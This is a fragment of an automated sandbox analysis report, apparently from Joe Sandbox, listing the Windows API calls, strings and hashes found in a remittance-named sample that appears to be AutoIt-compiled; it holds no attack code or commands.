                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: AU3_GetPluginDetails
                                                                      • API String ID: 145871493-4132174516
                                                                      • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                      • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 3375834691-2298589950
                                                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: $<
                                                                      • API String ID: 4104443479-428540627
                                                                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID: \VH
                                                                      • API String ID: 1682464887-234962358
                                                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID: \VH
                                                                      • API String ID: 1682464887-234962358
                                                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID: \VH
                                                                      • API String ID: 1682464887-234962358
                                                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: \VH
                                                                      • API String ID: 2507767853-234962358
                                                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: \VH
                                                                      • API String ID: 2507767853-234962358
                                                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                      • String ID: crts
                                                                      • API String ID: 943502515-3724388283
                                                                      • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                      • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                      • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                      • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$LabelVolume
                                                                      • String ID: \VH
                                                                      • API String ID: 2006950084-234962358
                                                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                      • DrawMenuBar.USER32 ref: 00449761
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                                      • String ID: 0
                                                                      • API String ID: 772068139-4108050209
                                                                      • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                      • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
